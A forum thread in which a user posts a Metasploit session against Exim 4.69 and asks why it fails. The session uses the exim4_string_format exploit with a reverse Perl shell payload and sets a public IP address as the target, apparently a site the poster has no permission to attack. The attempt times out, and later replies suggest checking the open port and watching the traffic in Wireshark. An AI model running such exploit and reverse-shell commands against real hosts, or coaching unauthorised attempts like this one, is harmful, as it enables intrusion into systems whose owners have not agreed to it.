Exim smtpd 4.69 exploit - Web Application Security

Hardcore-Gabber

Please cane you tell me what is the problem with this exploit . or i am doing wrong something ..

So here is the exploit and also a video tutorial that i have used ..

http://www.youtube.com/watch?v=DnSgOGIxjaQ

and the exploit

http://www.metasploit.com/modules/explo ... ing_format

the port is opened in the site that i want to exploit . and the exim smtpd version is 4.69 ..

i am using Backtrack 4 r2 with Metasploit //

this are the steps that i am doing ///

msf > use exploit/unix/smtp/exim4_string_format
msf > set PAYLOAD cmd/unix/reverse_perl
PAYLOAD => cmd/unix/reverse_perl
msf exploit(exim4_string_format) > set LHOST 192.168.70.129
LHOST => 192.168.70.129
msf exploit(exim4_string_format) > set RHOST 46.243.8.219
RHOST => 46.243.8.219
msf exploit(exim4_string_format) > exploit
[*] Started reverse handler on 192.168.70.129:4444
[*] Connecting to sites ip:25 ...
[-] Exploit exception: The connection timed out (46.243.8.219:25).
[*] Exploit completed, but no session was created.

I am getting Timeout instead of connecting to the site ..
i have tried with an another host but i got Timeout again ..

[align=center]Thanks[/align]

Xin

Is the port open on the server?

Hardcore-Gabber

Yes the port is Opened .....

McKittrick

once again, another case of someone "firing blind". this is what i was referring to when i posted about people who just fire up metasploit or what have you and wait for what the PROGRAM says

why not fire up wireshark/any protocol anayzer (mainly payload response) and see the ACTUAL RESPONSE COMING BACK TO YOU?

i hate to be so negative but i see this stuff all the time. you can't always rely on some app in front of you. you actually have to watch the traffic/payloads to really see into what you are doing

my 2*

Hardcore-Gabber

Thanks i will try it ...

Howdy, Stranger!

Top Posters

Who's Online (2)